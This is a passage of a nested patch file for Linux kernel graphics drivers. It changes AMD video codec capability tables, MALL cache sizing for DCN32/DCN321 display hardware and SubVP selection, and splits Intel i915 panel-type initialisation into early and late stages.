++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn1 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn1,
+ };
+ 
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+@@ -68,23 +80,47 @@ static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn1[] =
++{
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn1 =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_decode_array,
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn1,
+ };
+ 
+ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 				 const struct amdgpu_video_codecs **codecs)
+ {
+-	switch (adev->ip_versions[UVD_HWIP][0]) {
++	if (adev->vcn.num_vcn_inst == hweight8(adev->vcn.harvest_config))
++		return -EINVAL;
+ 
++	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(4, 0, 0):
+ 	case IP_VERSION(4, 0, 2):
+-		if (encode)
+-			*codecs = &vcn_4_0_0_video_codecs_encode;
+-		else
+-			*codecs = &vcn_4_0_0_video_codecs_decode;
++	case IP_VERSION(4, 0, 4):
++		if (adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++		} else {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++		}
+ 		return 0;
+ 	default:
+ 		return -EINVAL;
+@@ -254,9 +290,10 @@ static int soc21_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc21_allowed_read_registers); i++) {
+ 		en = &soc21_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = soc21_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+index cd4e61bf04939..3ac599f74fea8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+@@ -280,7 +280,7 @@ phys_addr_t kfd_get_process_doorbells(struct kfd_process_device *pdd)
+ 	if (!pdd->doorbell_index) {
+ 		int r = kfd_alloc_process_doorbells(pdd->dev,
+ 						    &pdd->doorbell_index);
+-		if (r)
++		if (r < 0)
+ 			return 0;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 9919c39f7ea03..d70c64a9fcb2c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2109,13 +2109,19 @@ static bool dcn32_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
+-	dc->caps.max_cab_allocation_bytes = 67108864; // 64MB = 1024 * 1024 * 64
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_prefetch_end_to_mall_start_us = 15;
+ 	dc->caps.subvp_swath_height_margin_lines = 16;
+@@ -2545,3 +2551,55 @@ struct pipe_ctx *dcn32_acquire_idle_pipe_for_head_pipe_in_layer(
+ 
+ 	return idle_pipe;
+ }
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans)
++{
++	/*
++	 * DCN32 and DCN321 SKUs may have different sizes for MALL
++	 *  but we may not be able to access all the MALL space.
++	 *  If the num_chans is power of 2, then we can access all
++	 *  of the available MALL space.  Otherwise, we can only
++	 *  access:
++	 *
++	 *  max_cab_size_in_bytes = total_cache_size_in_bytes *
++	 *    ((2^floor(log2(num_chans)))/num_chans)
++	 *
++	 * Calculating the MALL sizes for all available SKUs, we
++	 *  have come up with the follow simplified check.
++	 * - we have max_chans which provides the max MALL size.
++	 *  Each chans supports 4MB of MALL so:
++	 *
++	 *  total_cache_size_in_bytes = max_chans * 4 MB
++	 *
++	 * - we have avail_chans which shows the number of channels
++	 *  we can use if we can't access the entire MALL space.
++	 *  It is generally half of max_chans
++	 * - so we use the following checks:
++	 *
++	 *   if (num_chans == max_chans), return max_chans
++	 *   if (num_chans < max_chans), return avail_chans
++	 *
++	 * - exception is GC_11_0_0 where we can't access max_chans,
++	 *  so we define max_avail_chans as the maximum available
++	 *  MALL space
++	 *
++	 */
++	int gc_11_0_0_max_chans = 48;
++	int gc_11_0_0_max_avail_chans = 32;
++	int gc_11_0_0_avail_chans = 16;
++	int gc_11_0_3_max_chans = 16;
++	int gc_11_0_3_avail_chans = 8;
++	int gc_11_0_2_max_chans = 8;
++	int gc_11_0_2_avail_chans = 4;
++
++	if (ASICREV_IS_GC_11_0_0(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_0_max_chans) ?
++			gc_11_0_0_max_avail_chans : gc_11_0_0_avail_chans;
++	} else if (ASICREV_IS_GC_11_0_2(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_2_max_chans) ?
++			gc_11_0_2_max_chans : gc_11_0_2_avail_chans;
++	} else { // if (ASICREV_IS_GC_11_0_3(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_3_max_chans) ?
++			gc_11_0_3_max_chans : gc_11_0_3_avail_chans;
++	}
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index f76120e67c16a..615244a1f95d5 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -142,6 +142,10 @@ void dcn32_restore_mall_state(struct dc *dc,
+ 		struct dc_state *context,
+ 		struct mall_temp_config *temp_config);
+ 
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe);
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans);
++
+ /* definitions for run time init of reg offsets */
+ 
+ /* CLK SRC */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index 6292ac515d1a4..d320e21680da1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1697,11 +1697,18 @@ static bool dcn321_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.max_cab_allocation_bytes = 33554432; // 32MB = 1024 * 1024 * 32
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_prefetch_end_to_mall_start_us = 15;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index 04cc96e700981..e22b4b3880af9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -676,7 +676,9 @@ static bool dcn32_assign_subvp_pipe(struct dc *dc,
+ 		 */
+ 		if (pipe->plane_state && !pipe->top_pipe &&
+ 				pipe->stream->mall_stream_config.type == SUBVP_NONE && refresh_rate < 120 && !pipe->plane_state->address.tmz_surface &&
+-				vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0) {
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0 ||
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] > 0 &&
++						dcn32_allow_subvp_with_active_margin(pipe)))) {
+ 			while (pipe) {
+ 				num_pipes++;
+ 				pipe = pipe->bottom_pipe;
+@@ -2379,8 +2381,11 @@ void dcn32_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_pa
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_2_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_2_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_2_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+@@ -2558,3 +2563,30 @@ void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
+ }
++
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe)
++{
++	bool allow = false;
++	uint32_t refresh_rate = 0;
++
++	/* Allow subvp on displays that have active margin for 2560x1440@60hz displays
++	 * only for now. There must be no scaling as well.
++	 *
++	 * For now we only enable on 2560x1440@60hz displays to enable 4K60 + 1440p60 configs
++	 * for p-state switching.
++	 */
++	if (pipe->stream && pipe->plane_state) {
++		refresh_rate = (pipe->stream->timing.pix_clk_100hz * 100 +
++						pipe->stream->timing.v_total * pipe->stream->timing.h_total - 1)
++						/ (double)(pipe->stream->timing.v_total * pipe->stream->timing.h_total);
++		if (pipe->stream->timing.v_addressable == 1440 &&
++				pipe->stream->timing.h_addressable == 2560 &&
++				refresh_rate >= 55 && refresh_rate <= 65 &&
++				pipe->plane_state->src_rect.height == 1440 &&
++				pipe->plane_state->src_rect.width == 2560 &&
++				pipe->plane_state->dst_rect.height == 1440 &&
++				pipe->plane_state->dst_rect.width == 2560)
++			allow = true;
++	}
++	return allow;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index 0ea406145c1d7..b80cef70fa60f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -534,8 +534,11 @@ void dcn321_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_p
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_21_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_21_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_21_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+diff --git a/drivers/gpu/drm/display/drm_hdmi_helper.c b/drivers/gpu/drm/display/drm_hdmi_helper.c
+index 0264abe552788..faf5e9efa7d33 100644
+--- a/drivers/gpu/drm/display/drm_hdmi_helper.c
++++ b/drivers/gpu/drm/display/drm_hdmi_helper.c
+@@ -44,10 +44,8 @@ int drm_hdmi_infoframe_set_hdr_metadata(struct hdmi_drm_infoframe *frame,
+ 
+ 	/* Sink EOTF is Bit map while infoframe is absolute values */
+ 	if (!is_eotf_supported(hdr_metadata->hdmi_metadata_type1.eotf,
+-	    connector->hdr_sink_metadata.hdmi_type1.eotf)) {
+-		DRM_DEBUG_KMS("EOTF Not Supported\n");
+-		return -EINVAL;
+-	}
++	    connector->hdr_sink_metadata.hdmi_type1.eotf))
++		DRM_DEBUG_KMS("Unknown EOTF %d\n", hdr_metadata->hdmi_metadata_type1.eotf);
+ 
+ 	err = hdmi_drm_infoframe_init(frame);
+ 	if (err < 0)
+diff --git a/drivers/gpu/drm/drm_atomic.c b/drivers/gpu/drm/drm_atomic.c
+index f197f59f6d99b..c0dc5858a7237 100644
+--- a/drivers/gpu/drm/drm_atomic.c
++++ b/drivers/gpu/drm/drm_atomic.c
+@@ -1070,6 +1070,7 @@ static void drm_atomic_connector_print_state(struct drm_printer *p,
+ 	drm_printf(p, "connector[%u]: %s\n", connector->base.id, connector->name);
+ 	drm_printf(p, "\tcrtc=%s\n", state->crtc ? state->crtc->name : "(null)");
+ 	drm_printf(p, "\tself_refresh_aware=%d\n", state->self_refresh_aware);
++	drm_printf(p, "\tmax_requested_bpc=%d\n", state->max_requested_bpc);
+ 
+ 	if (connector->connector_type == DRM_MODE_CONNECTOR_WRITEBACK)
+ 		if (state->writeback_job && state->writeback_job->fb)
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index ed4d93942dbd2..ecd6c5c3f4ded 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -2053,7 +2053,8 @@ void icl_dsi_init(struct drm_i915_private *dev_priv)
+ 	/* attach connector to encoder */
+ 	intel_connector_attach_encoder(intel_connector, encoder);
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	encoder->devdata = intel_bios_encoder_data_lookup(dev_priv, port);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, encoder->devdata, NULL);
+ 
+ 	mutex_lock(&dev->mode_config.mutex);
+ 	intel_panel_add_vbt_lfp_fixed_mode(intel_connector);
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index 178a8cbb75838..a70b7061742a8 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -620,14 +620,14 @@ static void dump_pnp_id(struct drm_i915_private *i915,
+ 
+ static int opregion_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+ 	return intel_opregion_get_panel_type(i915);
+ }
+ 
+ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 			      const struct intel_bios_encoder_data *devdata,
+-			      const struct edid *edid)
++			      const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_options *lvds_options;
+ 
+@@ -652,7 +652,7 @@ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 				const struct intel_bios_encoder_data *devdata,
+-				const struct edid *edid)
++				const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_lfp_data *data;
+ 	const struct bdb_lvds_lfp_data_ptrs *ptrs;
+@@ -701,9 +701,9 @@ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int fallback_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+-	return 0;
++	return use_fallback ? 0 : -1;
+ }
+ 
+ enum panel_type {
+@@ -715,13 +715,13 @@ enum panel_type {
+ 
+ static int get_panel_type(struct drm_i915_private *i915,
+ 			  const struct intel_bios_encoder_data *devdata,
+-			  const struct edid *edid)
++			  const struct edid *edid, bool use_fallback)
+ {
+ 	struct {
+ 		const char *name;
+ 		int (*get_panel_type)(struct drm_i915_private *i915,
+ 				      const struct intel_bios_encoder_data *devdata,
+-				      const struct edid *edid);
++				      const struct edid *edid, bool use_fallback);
+ 		int panel_type;
+ 	} panel_types[] = {
+ 		[PANEL_TYPE_OPREGION] = {
+@@ -744,7 +744,8 @@ static int get_panel_type(struct drm_i915_private *i915,
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(panel_types); i++) {
+-		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata, edid);
++		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata,
++									  edid, use_fallback);
+ 
+ 		drm_WARN_ON(&i915->drm, panel_types[i].panel_type > 0xf &&
+ 			    panel_types[i].panel_type != 0xff);
+@@ -2592,6 +2593,12 @@ intel_bios_encoder_supports_edp(const struct intel_bios_encoder_data *devdata)
+ 		devdata->child.device_type & DEVICE_TYPE_INTERNAL_CONNECTOR;
+ }
+ 
++static bool
++intel_bios_encoder_supports_dsi(const struct intel_bios_encoder_data *devdata)
++{
++	return devdata->child.device_type & DEVICE_TYPE_MIPI_OUTPUT;
++}
++
+ static int _intel_bios_hdmi_level_shift(const struct intel_bios_encoder_data *devdata)
+ {
+ 	if (!devdata || devdata->i915->display.vbt.version < 158)
+@@ -2642,7 +2649,7 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ {
+ 	struct drm_i915_private *i915 = devdata->i915;
+ 	const struct child_device_config *child = &devdata->child;
+-	bool is_dvi, is_hdmi, is_dp, is_edp, is_crt, supports_typec_usb, supports_tbt;
++	bool is_dvi, is_hdmi, is_dp, is_edp, is_dsi, is_crt, supports_typec_usb, supports_tbt;
+ 	int dp_boost_level, dp_max_link_rate, hdmi_boost_level, hdmi_level_shift, max_tmds_clock;
+ 
+ 	is_dvi = intel_bios_encoder_supports_dvi(devdata);
+@@ -2650,13 +2657,14 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ 	is_crt = intel_bios_encoder_supports_crt(devdata);
+ 	is_hdmi = intel_bios_encoder_supports_hdmi(devdata);
+ 	is_edp = intel_bios_encoder_supports_edp(devdata);
++	is_dsi = intel_bios_encoder_supports_dsi(devdata);
+ 
+ 	supports_typec_usb = intel_bios_encoder_supports_typec_usb(devdata);
+ 	supports_tbt = intel_bios_encoder_supports_tbt(devdata);
+ 
+ 	drm_dbg_kms(&i915->drm,
+-		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
+-		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp,
++		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d DSI:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
++		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp, is_dsi,
+ 		    HAS_LSPCON(i915) && child->lspcon,
+ 		    supports_typec_usb, supports_tbt,
+ 		    devdata->dsc != NULL);
+@@ -2701,6 +2709,8 @@ static void parse_ddi_port(struct intel_bios_encoder_data *devdata)
+ 	enum port port;
+ 
+ 	port = dvo_port_to_port(i915, child->dvo_port);
++	if (port == PORT_NONE && DISPLAY_VER(i915) >= 11)
++		port = dsi_dvo_port_to_port(i915, child->dvo_port);
+ 	if (port == PORT_NONE)
+ 		return;
+ 
+@@ -3191,14 +3201,26 @@ out:
+ 	kfree(oprom_vbt);
+ }
+ 
+-void intel_bios_init_panel(struct drm_i915_private *i915,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid)
++static void intel_bios_init_panel(struct drm_i915_private *i915,
++				  struct intel_panel *panel,
++				  const struct intel_bios_encoder_data *devdata,
++				  const struct edid *edid,
++				  bool use_fallback)
+ {
+-	init_vbt_panel_defaults(panel);
++	/* already have it? */
++	if (panel->vbt.panel_type >= 0) {
++		drm_WARN_ON(&i915->drm, !use_fallback);
++		return;
++	}
+ 
+-	panel->vbt.panel_type = get_panel_type(i915, devdata, edid);
++	panel->vbt.panel_type = get_panel_type(i915, devdata,
++					       edid, use_fallback);
++	if (panel->vbt.panel_type < 0) {
++		drm_WARN_ON(&i915->drm, use_fallback);
++		return;
++	}
++
++	init_vbt_panel_defaults(panel);
+ 
+ 	parse_panel_options(i915, panel);
+ 	parse_generic_dtd(i915, panel);
+@@ -3213,6 +3235,21 @@ void intel_bios_init_panel(struct drm_i915_private *i915,
+ 	parse_mipi_sequence(i915, panel);
+ }
+ 
++void intel_bios_init_panel_early(struct drm_i915_private *i915,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata)
++{
++	intel_bios_init_panel(i915, panel, devdata, NULL, false);
++}
++
++void intel_bios_init_panel_late(struct drm_i915_private *i915,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid)
++{
++	intel_bios_init_panel(i915, panel, devdata, edid, true);
++}
++
+ /**
+  * intel_bios_driver_remove - Free any resources allocated by intel_bios_init()
+  * @i915: i915 device instance
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.h b/drivers/gpu/drm/i915/display/intel_bios.h
+index e375405a78284..ff1fdd2e0c1c5 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.h
++++ b/drivers/gpu/drm/i915/display/intel_bios.h
+@@ -232,10 +232,13 @@ struct mipi_pps_data {
+ } __packed;
+ 
+ void intel_bios_init(struct drm_i915_private *dev_priv);
+-void intel_bios_init_panel(struct drm_i915_private *dev_priv,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid);
++void intel_bios_init_panel_early(struct drm_i915_private *dev_priv,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata);
++void intel_bios_init_panel_late(struct drm_i915_private *dev_priv,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid);
+ void intel_bios_fini_panel(struct intel_panel *panel);
+ void intel_bios_driver_remove(struct drm_i915_private *dev_priv);
+ bool intel_bios_is_valid_vbt(const void *buf, size_t size);
+diff --git a/drivers/gpu/drm/i915/display/intel_connector.c b/drivers/gpu/drm/i915/display/intel_connector.c
+index 6d5cbeb8df4da..8bb296f3d6252 100644
+--- a/drivers/gpu/drm/i915/display/intel_connector.c
++++ b/drivers/gpu/drm/i915/display/intel_connector.c
+@@ -54,7 +54,7 @@ int intel_connector_init(struct intel_connector *connector)
+ 	__drm_atomic_helper_connector_reset(&connector->base,
+ 					    &conn_state->base);
+ 
+-	INIT_LIST_HEAD(&connector->panel.fixed_modes);
++	intel_panel_init_alloc(connector);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 298d00a11f473..135dbcab62b28 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -291,7 +291,7 @@ struct intel_vbt_panel_data {
+ 	struct drm_display_mode *sdvo_lvds_vbt_mode; /* if any */
+ 
+ 	/* Feature bits */
+-	unsigned int panel_type:4;
++	int panel_type;
+ 	unsigned int lvds_dither:1;
+ 	unsigned int bios_lvds_val; /* initial [PCH_]LVDS reg val in VBIOS */
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index b94bcceeff705..2e09899f2f927 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -5179,6 +5179,9 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	intel_bios_init_panel_early(dev_priv, &intel_connector->panel,
++				    encoder->devdata);
++
+ 	intel_pps_init(intel_dp);
+ 
+ 	/* Cache DPCD and EDID for edp. */
+@@ -5213,8 +5216,8 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel,
+-			      encoder->devdata, IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel,
++				   encoder->devdata, IS_ERR(edid) ? NULL : edid);
+ 
+ 	intel_panel_add_edid_fixed_modes(intel_connector, true);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_lvds.c b/drivers/gpu/drm/i915/display/intel_lvds.c
+index e5352239b2a2f..a749a5a66d624 100644
+--- a/drivers/gpu/drm/i915/display/intel_lvds.c
++++ b/drivers/gpu/drm/i915/display/intel_lvds.c
+@@ -967,8 +967,8 @@ void intel_lvds_init(struct drm_i915_private *dev_priv)
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL,
+-			      IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL,
++				   IS_ERR(edid) ? NULL : edid);
+ 
+ 	/* Try EDID first */
+ 	intel_panel_add_edid_fixed_modes(intel_connector,
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.c b/drivers/gpu/drm/i915/display/intel_panel.c
+index f72f4646c0d70..b50db0dd20fc5 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.c
++++ b/drivers/gpu/drm/i915/display/intel_panel.c
+@@ -648,6 +648,14 @@ intel_panel_mode_valid(struct intel_connector *connector,
+ 	return MODE_OK;
+ }
+ 
++void intel_panel_init_alloc(struct intel_connector *connector)
++{
++	struct intel_panel *panel = &connector->panel;
++
++	connector->panel.vbt.panel_type = -1;
++	INIT_LIST_HEAD(&panel->fixed_modes);
++}
++
+ int intel_panel_init(struct intel_connector *connector)
+ {
+ 	struct intel_panel *panel = &connector->panel;
